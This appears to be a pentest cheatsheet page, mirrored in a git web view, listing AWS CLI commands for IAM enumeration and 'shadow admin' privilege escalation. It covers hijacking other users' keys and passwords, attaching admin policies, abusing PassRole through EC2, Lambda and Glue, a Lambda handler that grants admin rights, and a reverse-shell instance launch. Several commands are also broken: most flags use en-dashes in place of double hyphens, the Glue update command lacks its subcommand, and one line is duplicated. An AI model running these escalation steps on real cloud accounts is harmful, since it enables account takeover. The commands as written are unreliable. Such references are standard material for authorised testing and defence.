daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

aws-iam.md (6734B)


      1 ---
      2 title: "AWS - Identity & Access Management"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/aws/aws-iam.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/aws/aws-iam.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # AWS - Identity & Access Management
     12 
     13 ## Listing IAM access Keys
     14 
     15 ```ps1
     16 aws iam list-access-keys
     17 ```
     18 
     19 ## Listing IAM Users and Groups
     20 
     21 ```ps1
     22 aws iam list-users
     23 aws iam list-groups
     24 ```
     25 
     26 ## Get IAM Details
     27 
     28 ```ps1
     29 aws iam get-account-authorization-details > iam.json
     30 ```
     31 
     32 ## Assume a Specific Role
     33 
     34 ```ps1
     35 aws sts assume-role --role-arn arn:aws:iam::${accountId}:role/${roleName} --role-session-name ${roleName}
     36 ```
     37 
     38 ## Login with MFA
     39 
     40 Retrieve the MFA device ARN:
     41 
     42 ```ps1
     43 aws iam list-mfa-devices
     44 ```
     45 
     46 Then create the session token:
     47 
     48 ```ps1
     49 aws sts get-session-token --serial-number ${arnMFADevice} --token-code ${MFACode}
     50 ```
     51 
     52 ## Shadow Admin
     53 
     54 ### Admin equivalent permission
     55 
     56 - AdministratorAccess
     57 
     58     ```powershell
     59     "Action": "*"
     60     "Resource": "*"
     61     ```
     62 
     63 - **ec2:AssociateIamInstanceProfile** : attach an IAM instance profile to an EC2 instance
     64 
     65     ```powershell
     66     aws ec2 associate-iam-instance-profile --iam-instance-profile Name=admin-role --instance-id i-0123456789
     67     ```
     68 
     69 - **iam:CreateAccessKey** : create a new access key to another IAM admin account
     70 
     71     ```powershell
     72     aws iam create-access-key –user-name target_user
     73     ```
     74 
     75 - **iam:CreateLoginProfile** : add a new password-based login profile, set a new password for an entity and impersonate it
     76 
     77     ```powershell
     78     aws iam create-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required
     79     ```
     80 
     81 - **iam:UpdateLoginProfile** : reset other IAM users’ login passwords.
     82 
     83     ```powershell
     84     aws iam update-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required
     85     ```
     86 
     87 - **iam:AttachUserPolicy**, **iam:AttachGroupPolicy** or **iam:AttachRolePolicy** : attach existing admin policy to any other entity he currently possesses
     88 
     89     ```powershell
     90     aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess
     91     aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess
     92     aws iam attach-role-policy –role-name role_i_can_assume –policy-arn arn:aws:iam::aws:policy/AdministratorAccess
     93     ```
     94 
     95 - **iam:PutUserPolicy**, **iam:PutGroupPolicy** or **iam:PutRolePolicy** : added inline policy will allow the attacker to grant additional privileges to previously compromised entities.
     96 
     97     ```powershell
     98     aws iam put-user-policy –user-name my_username –policy-name my_inline_policy –policy-document file://path/to/administrator/policy.json
     99     ```
    100 
    101 - **iam:CreatePolicy** : add a stealthy admin policy
    102 - **iam:AddUserToGroup** : add into the admin group of the organization.
    103 
    104     ```powershell
    105     aws iam add-user-to-group –group-name target_group –user-name my_username
    106     ```
    107 
    108 - **iam:UpdateAssumeRolePolicy** + **sts:AssumeRole** : change the assuming permissions of a privileged role and then assume it with a non-privileged account.
    109 
    110     ```powershell
    111     aws iam update-assume-role-policy –role-name role_i_can_assume –policy-document file://path/to/assume/role/policy.json
    112     ```
    113 
    114 - **iam:CreatePolicyVersion** & **iam:SetDefaultPolicyVersion** : change customer-managed policies and change a non-privileged entity to be a privileged one.
    115 
    116     ```powershell
    117     aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default
    118     aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
    119     ```
    120 
    121 - **lambda:UpdateFunctionCode** : give an attacker access to the privileges associated with the Lambda service role that is attached to that function.
    122 
    123     ```powershell
    124     aws lambda update-function-code –function-name target_function –zip-file fileb://my/lambda/code/zipped.zip
    125     ```
    126 
    127 - **glue:UpdateDevEndpoint** : give an attacker access to the privileges associated with the role attached to the specific Glue development endpoint.
    128 
    129     ```powershell
    130     aws glue –endpoint-name target_endpoint –public-key file://path/to/my/public/ssh/key.pub
    131     ```
    132 
    133 - **iam:PassRole** + **ec2:CreateInstanceProfile**/**ec2:AddRoleToInstanceProfile** : an attacker could create a new privileged instance profile and attach it to a compromised EC2 instance that he possesses.
    134 
    135 - **iam:PassRole** + **ec2:RunInstance** : give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account.
    136 
    137     ```powershell
    138     # add ssh key
    139     $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456
    140     # execute a reverse shell
    141     $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh
    142     ```
    143 
    144 - **iam:PassRole** + **lambda:CreateFunction** + **lambda:InvokeFunction** : give a user access to the privileges associated with any Lambda service role that exists in the account.
    145 
    146     ```powershell
    147     aws lambda create-function –function-name my_function –runtime python3.6 –role arn_of_lambda_role –handler lambda_function.lambda_handler –code file://my/python/code.py
    148     aws lambda invoke –function-name my_function output.txt
    149     ```
    150 
    151     Example of code.py
    152 
    153     ```python
    154     import boto3
    155     def lambda_handler(event, context):
    156         client = boto3.client('iam')
    157         response = client.attach_user_policy(
    158         UserName='my_username',
    159         PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    160         )
    161         return response
    162     ```
    163 
    164 - **iam:PassRole** + **glue:CreateDevEndpoint** : access to the privileges associated with any Glue service role that exists in the account.
    165 
    166     ```powershell
    167     aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub
    168     ```
    169 
    170 ## References
    171 
    172 - [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/)